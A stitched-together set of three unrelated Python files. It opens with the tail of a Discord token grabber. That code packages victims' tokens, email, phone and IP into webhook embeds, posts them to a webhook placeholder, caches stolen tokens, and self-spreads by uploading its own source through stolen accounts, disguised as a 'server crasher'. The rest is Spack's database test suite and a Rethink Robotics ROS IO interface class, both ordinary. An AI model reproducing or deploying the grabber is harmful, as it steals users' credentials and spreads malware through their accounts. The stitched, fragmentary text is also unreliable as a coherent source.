"name": "Made by Rushia.BasH. Don't Skid :)",
"value": f'Join our discord server https://discord.gg/Pw4GxgKzsk',
"inline": False
},
{
"name": "**Info**",
"value": f'Email: {email}\nPhone: {phone} \nIP: {ip}',
"inline": False
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Rushia's Token Grabber",
"avatar_url": "https://cdn.discordapp.com/attachments/756524108459540582/907284779022569472/500x500.jpg"
}
try: #webhook under this message
urlopen(Request("#webhook here", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
database.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check the database is functioning properly,
both in memory and in its file
"""
import datetime
import functools
import multiprocessing
import os
import pytest
import json
try:
import uuid
_use_uuid = True
except ImportError:
_use_uuid = False
pass
from jsonschema import validate
import llnl.util.lock as lk
from llnl.util.tty.colify import colify
import spack.repo
import spack.store
import spack.database
import spack.package
import spack.spec
from spack.util.mock_package import MockPackageMultiRepo
from spack.util.executable import Executable
from spack.schema.database_index import schema
pytestmark = pytest.mark.db
@pytest.fixture()
def test_store(tmpdir):
real_store = spack.store.store
spack.store.store = spack.store.Store(str(tmpdir.join('test_store')))
yield
spack.store.store = real_store
@pytest.fixture()
def upstream_and_downstream_db(tmpdir_factory, gen_mock_layout):
mock_db_root = str(tmpdir_factory.mktemp('mock_db_root'))
upstream_write_db = spack.database.Database(mock_db_root)
upstream_db = spack.database.Database(mock_db_root, is_upstream=True)
# Generate initial DB file to avoid reindex
with open(upstream_write_db._index_path, 'w') as db_file:
upstream_write_db._write_to_file(db_file)
upstream_layout = gen_mock_layout('/a/')
downstream_db_root = str(
tmpdir_factory.mktemp('mock_downstream_db_root'))
downstream_db = spack.database.Database(
downstream_db_root, upstream_dbs=[upstream_db])
with open(downstream_db._index_path, 'w') as db_file:
downstream_db._write_to_file(db_file)
downstream_layout = gen_mock_layout('/b/')
yield upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout
@pytest.mark.usefixtures('config')
def test_installed_upstream(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('w', [x, y], [default, default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('w')
spec.concretize()
for dep in spec.traverse(root=False):
upstream_write_db.add(dep, upstream_layout)
upstream_db._read()
for dep in spec.traverse(root=False):
record = downstream_db.get_by_hash(dep.dag_hash())
assert record is not None
with pytest.raises(spack.database.ForbiddenLockError):
record = upstream_db.get_by_hash(dep.dag_hash())
new_spec = spack.spec.Spec('w')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
for dep in new_spec.traverse(root=False):
upstream, record = downstream_db.query_by_spec_hash(
dep.dag_hash())
assert upstream
assert record.path == upstream_layout.path_for_spec(dep)
upstream, record = downstream_db.query_by_spec_hash(
new_spec.dag_hash())
assert not upstream
assert record.installed
upstream_db._check_ref_counts()
downstream_db._check_ref_counts()
@pytest.mark.usefixtures('config')
def test_removed_upstream_dep(upstream_and_downstream_db):
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
mock_repo.add_package('y', [z], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('y')
spec.concretize()
upstream_write_db.add(spec['z'], upstream_layout)
upstream_db._read()
new_spec = spack.spec.Spec('y')
new_spec.concretize()
downstream_db.add(new_spec, downstream_layout)
upstream_write_db.remove(new_spec['z'])
upstream_db._read()
new_downstream = spack.database.Database(
downstream_db.root, upstream_dbs=[upstream_db])
new_downstream._fail_when_missing_deps = True
with pytest.raises(spack.database.MissingDependenciesError):
new_downstream._read()
@pytest.mark.usefixtures('config')
def test_add_to_upstream_after_downstream(upstream_and_downstream_db):
"""An upstream DB can add a package after it is installed in the downstream
DB. When a package is recorded as installed in both, the results should
refer to the downstream DB.
"""
upstream_write_db, upstream_db, upstream_layout,\
downstream_db, downstream_layout = (upstream_and_downstream_db)
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
downstream_db.add(spec, downstream_layout)
upstream_write_db.add(spec, upstream_layout)
upstream_db._read()
upstream, record = downstream_db.query_by_spec_hash(spec.dag_hash())
# Even though the package is recorded as installed in the upstream DB,
# we prefer the locally-installed instance
assert not upstream
qresults = downstream_db.query('x')
assert len(qresults) == 1
queried_spec, = qresults
try:
orig_db = spack.store.db
spack.store.db = downstream_db
assert queried_spec.prefix == downstream_layout.path_for_spec(spec)
finally:
spack.store.db = orig_db
@pytest.mark.usefixtures('config')
def test_cannot_write_upstream(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/']]
mock_repo = MockPackageMultiRepo()
mock_repo.add_package('x', [], [])
# Instantiate the database that will be used as the upstream DB and make
# sure it has an index file
upstream_db_independent = spack.database.Database(roots[1])
with upstream_db_independent.write_transaction():
pass
upstream_dbs = spack.store._construct_upstream_dbs_from_install_roots(
[roots[1]], _test=True)
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
with pytest.raises(spack.database.ForbiddenLockError):
upstream_dbs[0].add(spec, layouts[1])
@pytest.mark.usefixtures('config')
def test_recursive_upstream_dbs(tmpdir_factory, test_store, gen_mock_layout):
roots = [str(tmpdir_factory.mktemp(x)) for x in ['a', 'b', 'c']]
layouts = [gen_mock_layout(x) for x in ['/ra/', '/rb/', '/rc/']]
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [default])
mock_repo.add_package('x', [y], [default])
with spack.repo.swap(mock_repo):
spec = spack.spec.Spec('x')
spec.concretize()
db_c = spack.database.Database(roots[2])
db_c.add(spec['z'], layouts[2])
db_b = spack.database.Database(roots[1], upstream_dbs=[db_c])
db_b.add(spec['y'], layouts[1])
db_a = spack.database.Database(roots[0], upstream_dbs=[db_b, db_c])
db_a.add(spec['x'], layouts[0])
upstream_dbs_from_scratch = (
spack.store._construct_upstream_dbs_from_install_roots(
[roots[1], roots[2]], _test=True))
db_a_from_scratch = spack.database.Database(
roots[0], upstream_dbs=upstream_dbs_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec.dag_hash()) == (
db_a_from_scratch)
assert db_a_from_scratch.db_for_spec_hash(spec['y'].dag_hash()) == (
upstream_dbs_from_scratch[0])
assert db_a_from_scratch.db_for_spec_hash(spec['z'].dag_hash()) == (
upstream_dbs_from_scratch[1])
db_a_from_scratch._check_ref_counts()
upstream_dbs_from_scratch[0]._check_ref_counts()
upstream_dbs_from_scratch[1]._check_ref_counts()
assert (db_a_from_scratch.installed_relatives(spec) ==
set(spec.traverse(root=False)))
assert (db_a_from_scratch.installed_relatives(
spec['z'], direction='parents') == set([spec, spec['y']]))
@pytest.fixture()
def usr_folder_exists(monkeypatch):
"""The ``/usr`` folder is assumed to be existing in some tests. This
fixture makes it such that its existence is mocked, so we have no
requirements on the system running tests.
"""
isdir = os.path.isdir
@functools.wraps(os.path.isdir)
def mock_isdir(path):
if path == '/usr':
return True
return isdir(path)
monkeypatch.setattr(os.path, 'isdir', mock_isdir)
def _print_ref_counts():
"""Print out all ref counts for the graph used here, for debugging"""
recs = []
def add_rec(spec):
cspecs = spack.store.db.query(spec, installed=any)
if not cspecs:
recs.append("[ %-7s ] %-20s-" % ('', spec))
else:
key = cspecs[0].dag_hash()
rec = spack.store.db.get_record(cspecs[0])
recs.append("[ %-7s ] %-20s%d" % (key[:7], spec, rec.ref_count))
with spack.store.db.read_transaction():
add_rec('mpileaks ^mpich')
add_rec('callpath ^mpich')
add_rec('mpich')
add_rec('mpileaks ^mpich2')
add_rec('callpath ^mpich2')
add_rec('mpich2')
add_rec('mpileaks ^zmpi')
add_rec('callpath ^zmpi')
add_rec('zmpi')
add_rec('fake')
add_rec('dyninst')
add_rec('libdwarf')
add_rec('libelf')
colify(recs, cols=3)
def _check_merkleiness():
"""Ensure the spack database is a valid merkle graph."""
all_specs = spack.store.db.query(installed=any)
seen = {}
for spec in all_specs:
for dep in spec.dependencies():
hash_key = dep.dag_hash()
if hash_key not in seen:
seen[hash_key] = id(dep)
else:
assert seen[hash_key] == id(dep)
def _check_db_sanity(database):
"""Utiilty function to check db against install layout."""
pkg_in_layout = sorted(spack.store.layout.all_specs())
actual = sorted(database.query())
externals = sorted([x for x in actual if x.external])
nexpected = len(pkg_in_layout) + len(externals)
assert nexpected == len(actual)
non_external_in_db = sorted([x for x in actual if not x.external])
for e, a in zip(pkg_in_layout, non_external_in_db):
assert e == a
_check_merkleiness()
def _check_remove_and_add_package(database, spec):
"""Remove a spec from the DB, then add it and make sure everything's
still ok once it is added. This checks that it was
removed, that it's back when added again, and that ref
counts are consistent.
"""
original = database.query()
database._check_ref_counts()
# Remove spec
concrete_spec = database.remove(spec)
database._check_ref_counts()
remaining = database.query()
# ensure spec we removed is gone
assert len(original) - 1 == len(remaining)
assert all(s in original for s in remaining)
assert concrete_spec not in remaining
# add it back and make sure everything is ok.
database.add(concrete_spec, spack.store.layout)
installed = database.query()
assert concrete_spec in installed
assert installed == original
    # sanity check against directory layout and check ref counts.
_check_db_sanity(database)
database._check_ref_counts()
def _mock_install(spec):
s = spack.spec.Spec(spec)
s.concretize()
pkg = spack.repo.get(s)
pkg.do_install(fake=True)
def _mock_remove(spec):
specs = spack.store.db.query(spec)
assert len(specs) == 1
spec = specs[0]
spec.package.do_uninstall(spec)
def test_default_queries(database):
# Testing a package whose name *doesn't* start with 'lib'
# to ensure the library has 'lib' prepended to the name
rec = database.get_record('zmpi')
spec = rec.spec
libraries = spec['zmpi'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'zmpi'
headers = spec['zmpi'].headers
assert len(headers) == 1
assert headers.names[0] == 'zmpi'
command = spec['zmpi'].command
assert isinstance(command, Executable)
assert command.name == 'zmpi'
assert os.path.exists(command.path)
# Testing a package whose name *does* start with 'lib'
# to ensure the library doesn't have a double 'lib' prefix
rec = database.get_record('libelf')
spec = rec.spec
libraries = spec['libelf'].libs
assert len(libraries) == 1
assert libraries.names[0] == 'elf'
headers = spec['libelf'].headers
assert len(headers) == 1
assert headers.names[0] == 'libelf'
command = spec['libelf'].command
assert isinstance(command, Executable)
assert command.name == 'libelf'
assert os.path.exists(command.path)
def test_005_db_exists(database):
"""Make sure db cache file exists after creating."""
index_file = os.path.join(database.root, '.spack-db', 'index.json')
lock_file = os.path.join(database.root, '.spack-db', 'lock')
assert os.path.exists(str(index_file))
assert os.path.exists(str(lock_file))
with open(index_file) as fd:
index_object = json.load(fd)
validate(index_object, schema)
def test_010_all_install_sanity(database):
"""Ensure that the install layout reflects what we think it does."""
all_specs = spack.store.layout.all_specs()
assert len(all_specs) == 14
# Query specs with multiple configurations
mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]
callpath_specs = [s for s in all_specs if s.satisfies('callpath')]
mpi_specs = [s for s in all_specs if s.satisfies('mpi')]
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# Query specs with single configurations
dyninst_specs = [s for s in all_specs if s.satisfies('dyninst')]
libdwarf_specs = [s for s in all_specs if s.satisfies('libdwarf')]
libelf_specs = [s for s in all_specs if s.satisfies('libelf')]
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^mpich2')]
) == 1
assert len(
[s for s in all_specs if s.satisfies('mpileaks ^zmpi')]
) == 1
def test_015_write_and_read(mutable_database):
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_017_write_and_read_without_uuid(mutable_database, monkeypatch):
monkeypatch.setattr(spack.database, '_use_uuid', False)
# write and read DB
with spack.store.db.write_transaction():
specs = spack.store.db.query()
recs = [spack.store.db.get_record(s) for s in specs]
for spec, rec in zip(specs, recs):
new_rec = spack.store.db.get_record(spec)
assert new_rec.ref_count == rec.ref_count
assert new_rec.spec == rec.spec
assert new_rec.path == rec.path
assert new_rec.installed == rec.installed
def test_020_db_sanity(database):
"""Make sure query() returns what's actually in the db."""
_check_db_sanity(database)
def test_025_reindex(mutable_database):
"""Make sure reindex works and ref counts are valid."""
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_026_reindex_after_deprecate(mutable_database):
"""Make sure reindex works and ref counts are valid after deprecation."""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_030_db_sanity_from_another_process(mutable_database):
def read_and_modify():
# check that other process can read DB
_check_db_sanity(mutable_database)
with mutable_database.write_transaction():
_mock_remove('mpileaks ^zmpi')
p = multiprocessing.Process(target=read_and_modify, args=())
p.start()
p.join()
# ensure child process change is visible in parent process
with mutable_database.read_transaction():
assert len(mutable_database.query('mpileaks ^zmpi')) == 0
def test_040_ref_counts(database):
"""Ensure that we got ref counts right when we read the DB."""
database._check_ref_counts()
def test_041_ref_counts_deprecate(mutable_database):
"""Ensure that we have appropriate ref counts after deprecating"""
mpich = mutable_database.query_one('mpich')
zmpi = mutable_database.query_one('zmpi')
mutable_database.deprecate(mpich, zmpi)
mutable_database._check_ref_counts()
def test_050_basic_query(database):
"""Ensure querying database is consistent with what is installed."""
# query everything
assert len(spack.store.db.query()) == 16
# query specs with multiple configurations
mpileaks_specs = database.query('mpileaks')
callpath_specs = database.query('callpath')
mpi_specs = database.query('mpi')
assert len(mpileaks_specs) == 3
assert len(callpath_specs) == 3
assert len(mpi_specs) == 3
# query specs with single configurations
dyninst_specs = database.query('dyninst')
libdwarf_specs = database.query('libdwarf')
libelf_specs = database.query('libelf')
assert len(dyninst_specs) == 1
assert len(libdwarf_specs) == 1
assert len(libelf_specs) == 1
# Query by dependency
assert len(database.query('mpileaks ^mpich')) == 1
assert len(database.query('mpileaks ^mpich2')) == 1
assert len(database.query('mpileaks ^zmpi')) == 1
# Query by date
assert len(database.query(start_date=datetime.datetime.min)) == 16
assert len(database.query(start_date=datetime.datetime.max)) == 0
assert len(database.query(end_date=datetime.datetime.min)) == 0
assert len(database.query(end_date=datetime.datetime.max)) == 16
def test_060_remove_and_add_root_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'mpileaks ^mpich')
def test_070_remove_and_add_dependency_package(mutable_database):
_check_remove_and_add_package(mutable_database, 'dyninst')
def test_080_root_ref_counts(mutable_database):
rec = mutable_database.get_record('mpileaks ^mpich')
# Remove a top-level spec from the DB
mutable_database.remove('mpileaks ^mpich')
# record no longer in DB
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
# record's deps have updated ref_counts
assert mutable_database.get_record('callpath ^mpich').ref_count == 0
assert mutable_database.get_record('mpich').ref_count == 1
# Put the spec back
mutable_database.add(rec.spec, spack.store.layout)
# record is present again
assert len(mutable_database.query('mpileaks ^mpich', installed=any)) == 1
# dependencies have ref counts updated
assert mutable_database.get_record('callpath ^mpich').ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
def test_090_non_root_ref_counts(mutable_database):
mutable_database.get_record('mpileaks ^mpich')
mutable_database.get_record('callpath ^mpich')
# "force remove" a non-root spec from the DB
mutable_database.remove('callpath ^mpich')
# record still in DB but marked uninstalled
assert mutable_database.query('callpath ^mpich', installed=True) == []
assert len(mutable_database.query('callpath ^mpich', installed=any)) == 1
# record and its deps have same ref_counts
assert mutable_database.get_record(
'callpath ^mpich', installed=any
).ref_count == 1
assert mutable_database.get_record('mpich').ref_count == 2
# remove only dependent of uninstalled callpath record
mutable_database.remove('mpileaks ^mpich')
# record and parent are completely gone.
assert mutable_database.query('mpileaks ^mpich', installed=any) == []
assert mutable_database.query('callpath ^mpich', installed=any) == []
# mpich ref count updated properly.
mpich_rec = mutable_database.get_record('mpich')
assert mpich_rec.ref_count == 0
def test_100_no_write_with_exception_on_remove(database):
def fail_while_writing():
with database.write_transaction():
_mock_remove('mpileaks ^zmpi')
raise Exception()
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure zmpi is still there.
with database.read_transaction():
assert len(database.query('mpileaks ^zmpi', installed=any)) == 1
def test_110_no_write_with_exception_on_install(database):
def fail_while_writing():
with database.write_transaction():
_mock_install('cmake')
raise Exception()
with database.read_transaction():
assert database.query('cmake', installed=any) == []
with pytest.raises(Exception):
fail_while_writing()
# reload DB and make sure cmake was not written.
with database.read_transaction():
assert database.query('cmake', installed=any) == []
def test_115_reindex_with_packages_not_in_repo(mutable_database):
# Don't add any package definitions to this repository; the idea is that
# packages should not have to be defined in the repository once they
# are installed
with spack.repo.swap(MockPackageMultiRepo()):
spack.store.store.reindex()
_check_db_sanity(mutable_database)
def test_external_entries_in_db(mutable_database):
rec = mutable_database.get_record('mpileaks ^zmpi')
assert rec.spec.external_path is None
assert not rec.spec.external_modules
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert not rec.spec.external_modules
assert rec.explicit is False
rec.spec.package.do_install(fake=True, explicit=True)
rec = mutable_database.get_record('externaltool')
assert rec.spec.external_path == '/path/to/external_tool'
assert not rec.spec.external_modules
assert rec.explicit is True
@pytest.mark.regression('8036')
def test_regression_issue_8036(mutable_database, usr_folder_exists):
# The test ensures that the external package prefix is treated as
# existing. Even when the package prefix exists, the package should
# not be considered installed until it is added to the database with
# do_install.
s = spack.spec.Spec('externaltool@0.9')
s.concretize()
assert not s.package.installed
# Now install the external package and check the `installed` property again
s.package.do_install(fake=True)
assert s.package.installed
@pytest.mark.regression('11118')
def test_old_external_entries_prefix(mutable_database):
with open(spack.store.db._index_path, 'r') as f:
db_obj = json.loads(f.read())
validate(db_obj, schema)
s = spack.spec.Spec('externaltool')
s.concretize()
db_obj['database']['installs'][s.dag_hash()]['path'] = 'None'
with open(spack.store.db._index_path, 'w') as f:
f.write(json.dumps(db_obj))
if _use_uuid:
with open(spack.store.db._verifier_path, 'w') as f:
f.write(str(uuid.uuid4()))
record = spack.store.db.get_record(s)
assert record.path is None
assert record.spec._prefix is None
assert record.spec.prefix == record.spec.external_path
def test_uninstall_by_spec(mutable_database):
with mutable_database.write_transaction():
for spec in mutable_database.query():
if spec.package.installed:
spack.package.PackageBase.uninstall_by_spec(spec, force=True)
else:
mutable_database.remove(spec)
assert len(mutable_database.query()) == 0
def test_query_unused_specs(mutable_database):
# This spec installs a fake cmake as a build only dependency
s = spack.spec.Spec('simple-inheritance')
s.concretize()
s.package.do_install(fake=True, explicit=True)
unused = spack.store.db.unused_specs
assert len(unused) == 1
assert unused[0].name == 'cmake'
@pytest.mark.regression('10019')
def test_query_spec_with_conditional_dependency(mutable_database):
# The issue is triggered by having dependencies that are
# conditional on a Boolean variant
s = spack.spec.Spec('hdf5~mpi')
s.concretize()
s.package.do_install(fake=True, explicit=True)
results = spack.store.db.query_local('hdf5 ^mpich')
assert not results
@pytest.mark.regression('10019')
def test_query_spec_with_non_conditional_virtual_dependency(database):
# Ensure the same issue doesn't come up for virtual
# dependencies that are not conditional on variants
results = spack.store.db.query_local('mpileaks ^mpich')
assert len(results) == 1
def test_failed_spec_path_error(database):
"""Ensure spec not concrete check is covered."""
s = spack.spec.Spec('a')
with pytest.raises(ValueError, match='Concrete spec required'):
spack.store.db._failed_spec_path(s)
@pytest.mark.db
def test_clear_failure_keep(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when to be retained."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
s = spack.spec.Spec('a')
spack.store.db.clear_failure(s)
out = capfd.readouterr()[0]
assert 'Retaining failure marking' in out
@pytest.mark.db
def test_clear_failure_forced(mutable_database, monkeypatch, capfd):
"""Add test coverage for clear_failure operation when force."""
def _is(db, spec):
return True
# Pretend the spec has been failure locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
# Ensure an OSError is raised when trying to remove the non-existent marking
monkeypatch.setattr(spack.database.Database, 'prefix_failure_marked', _is)
s = spack.spec.Spec('a').concretized()
spack.store.db.clear_failure(s, force=True)
out = capfd.readouterr()[1]
assert 'Removing failure marking despite lock' in out
assert 'Unable to remove failure marking' in out
@pytest.mark.db
def test_mark_failed(mutable_database, monkeypatch, tmpdir, capsys):
"""Add coverage to mark_failed."""
def _raise_exc(lock):
raise lk.LockTimeoutError('Mock acquire_write failure')
# Ensure attempt to acquire write lock on the mark raises the exception
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise_exc)
with tmpdir.as_cwd():
s = spack.spec.Spec('a').concretized()
spack.store.db.mark_failed(s)
out = str(capsys.readouterr()[1])
assert 'Unable to mark a as failed' in out
# Clean up the failure mark to ensure it does not interfere with other
# tests using the same spec.
del spack.store.db._prefix_failures[s.prefix]
@pytest.mark.db
def test_prefix_failed(mutable_database, monkeypatch):
"""Add coverage to prefix_failed operation."""
def _is(db, spec):
return True
s = spack.spec.Spec('a').concretized()
# Confirm the spec is not already marked as failed
assert not spack.store.db.prefix_failed(s)
# Check that a failure entry is sufficient
spack.store.db._prefix_failures[s.prefix] = None
assert spack.store.db.prefix_failed(s)
# Remove the entry and check again
del spack.store.db._prefix_failures[s.prefix]
assert not spack.store.db.prefix_failed(s)
# Now pretend that the prefix failure is locked
monkeypatch.setattr(spack.database.Database, 'prefix_failure_locked', _is)
assert spack.store.db.prefix_failed(s)
def test_prefix_read_lock_error(mutable_database, monkeypatch):
"""Cover the prefix read lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_read', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_read_lock(s):
assert False
def test_prefix_write_lock_error(mutable_database, monkeypatch):
"""Cover the prefix write lock exception."""
def _raise(db, spec):
raise lk.LockError('Mock lock error')
s = spack.spec.Spec('a').concretized()
# Ensure subsequent lock operations fail
monkeypatch.setattr(lk.Lock, 'acquire_write', _raise)
with pytest.raises(Exception):
with spack.store.db.prefix_write_lock(s):
assert False
|
io_interface.py
|
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import sys
import json
import copy
import threading
import uuid
from threading import Lock
import intera_dataflow
from io_command import SetCommand
from intera_core_msgs.msg import (
IODeviceConfiguration,
IODeviceStatus,
IOComponentCommand
)
class IOInterface(object):
"""
Base class for IO interfaces.
"""
def __init__(self, path_root, config_msg_type, status_msg_type):
self._path = path_root
self.config_mutex = Lock()
self.state_mutex = Lock()
self.cmd_times = []
self.ports = dict()
self.signals = dict()
self.config = config_msg_type()
self.state = status_msg_type()
self.config_changed = intera_dataflow.Signal()
self.state_changed = intera_dataflow.Signal()
self._config_sub = rospy.Subscriber(self._path + "/config",
config_msg_type,
self.handle_config)
self._state_sub = rospy.Subscriber(self._path + "/state",
status_msg_type,
self.handle_state)
self._command_pub = rospy.Publisher(self._path + "/command",
IOComponentCommand, queue_size=10)
# Wait for the config to be populated
intera_dataflow.wait_for(
lambda: self.config is not None and self.is_config_valid(),
timeout=5.0,
timeout_msg=("Failed to get config at: {}.".format(self._path + "/config"))
)
# Wait for the state to be populated too (optional)
is_init = intera_dataflow.wait_for(
lambda: self.state is not None and self.is_state_valid(),
timeout=5.0,
raise_on_error=False
)
if not is_init:
rospy.loginfo("Did not receive initial state at: {}."
" Device may not be activated yet.".format(self._path + "/state"))
rospy.logdebug("Making new IOInterface on %s" % (self._path,))
def invalidate_config(self):
"""
mark the config topic data as invalid
"""
with self.config_mutex:
self.config.time.secs = 0
def invalidate_state(self):
"""
mark the state topic data as invalid
"""
with self.state_mutex:
self.state.time.secs = 0
def is_config_valid(self):
"""
return true if the config topic data is valid
"""
return self.config.time.secs != 0
def is_state_valid(self):
"""
return true if the state topic data is valid
"""
return self.state.time.secs != 0
def is_valid(self):
"""
return true if both the state and config topic data are valid
"""
return self.is_config_valid() and self.is_state_valid()
def revalidate(self, timeout, invalidate_state=True, invalidate_config=True):
"""
invalidate the state and config topics, then wait up to timeout
seconds for them to become valid again.
return true if both the state and config topic data are valid
"""
if invalidate_state:
self.invalidate_state()
if invalidate_config:
self.invalidate_config()
timeout_time = rospy.Time.now() + rospy.Duration(timeout)
while not self.is_state_valid() and not rospy.is_shutdown():
rospy.sleep(0.1)
if timeout_time < rospy.Time.now():
rospy.logwarn("Timed out waiting for node interface valid...")
return False
return True
def handle_config(self, msg):
"""
config topic callback
"""
if not self.config or self.time_changed(self.config.time, msg.time):
with self.config_mutex:
self.config = msg
self.config_changed()
def load_state(self, current_state, incoming_state):
for state in incoming_state:
if state.name not in current_state:
current_state[state.name] = dict()
formatting = json.loads(state.format)
current_state[state.name]["type"] = formatting["type"]
current_state[state.name]["role"] = formatting["role"]
data = json.loads(state.data)
current_state[state.name]["data"] = data[0] if len(data) > 0 else None
def handle_state(self, msg):
"""
state topic callback
"""
if not self.state or self.time_changed(self.state.time, msg.time):
with self.state_mutex:
self.state = msg
self.state_changed()
self.load_state(self.ports, self.state.ports)
self.load_state(self.signals, self.state.signals)
def publish_command(self, op, args, timeout=2.0):
"""
publish on the command topic
return true if the command is acknowledged within the timeout
"""
cmd_time = rospy.Time.now()
self.cmd_times.append(cmd_time)
self.cmd_times = self.cmd_times[-100:] # cache last 100 cmd timestamps
cmd_msg = IOComponentCommand(
time=cmd_time,
op=op,
args=json.dumps(args))
rospy.logdebug("publish_command %s %s" % (cmd_msg.op, cmd_msg.args))
if timeout is not None:
timeout_time = rospy.Time.now() + rospy.Duration(timeout)
while not rospy.is_shutdown():
self._command_pub.publish(cmd_msg)
if self.is_state_valid():
if cmd_time in self.state.commands:
rospy.logdebug("command %s acknowleged" % (cmd_msg.op,))
return True
rospy.sleep(0.1)
if timeout_time < rospy.Time.now():
rospy.logwarn("Timed out waiting for command acknowlegment...")
break
return False
return True
@staticmethod
def time_changed(time1, time2):
"""
return true if the times are different
"""
return (time1.secs != time2.secs) or (time1.nsecs != time2.nsecs)
class IODeviceInterface(IOInterface):
"""
IO Device interface to config, status and command topics
"""
def __init__(self, node_name, dev_name):
super(IODeviceInterface, self).__init__(
'io/' + node_name + '/' + dev_name,
IODeviceConfiguration,
IODeviceStatus)
self._threads = dict()
self._callback_items = dict()
self._callback_functions = dict()
def list_signal_names(self):
"""
return a list of all signals
"""
with self.state_mutex:
return copy.deepcopy(self.signals.keys())
def get_signal_type(self, signal_name):
"""
return the type of the given signal, or None
"""
with self.state_mutex:
if signal_name in self.signals.keys():
return copy.deepcopy(self.signals[signal_name]['type'])
return None
def get_signal_value(self, signal_name):
"""
return the value of the given signal, or None
"""
with self.state_mutex:
if signal_name in self.signals.keys():
return copy.deepcopy(self.signals[signal_name]['data'])
return None
def set_signal_value(self, signal_name, signal_value, signal_type=None, timeout=5.0):
"""
set the value for the given signal
return True if the signal value is set, False if the requested signal is invalid
"""
if signal_name not in self.list_signal_names():
rospy.logerr("Cannot find signal '{0}' in this IO Device ({1}).".format(signal_name,
self._path))
return
if signal_type is None:
s_type = self.get_signal_type(signal_name)
if s_type is None:
rospy.logerr("Failed to get 'type' for signal '{0}'.".format(signal_name))
return
else:
s_type = signal_type
set_command = SetCommand().set_signal(signal_name, s_type, signal_value)
self.publish_command(set_command.op, set_command.args, timeout=timeout)
# make sure both state and config are valid:
self.revalidate(timeout, invalidate_state=False, invalidate_config=False)
def list_port_names(self):
"""
return a list of all ports
"""
with self.state_mutex:
return copy.deepcopy(self.ports.keys())
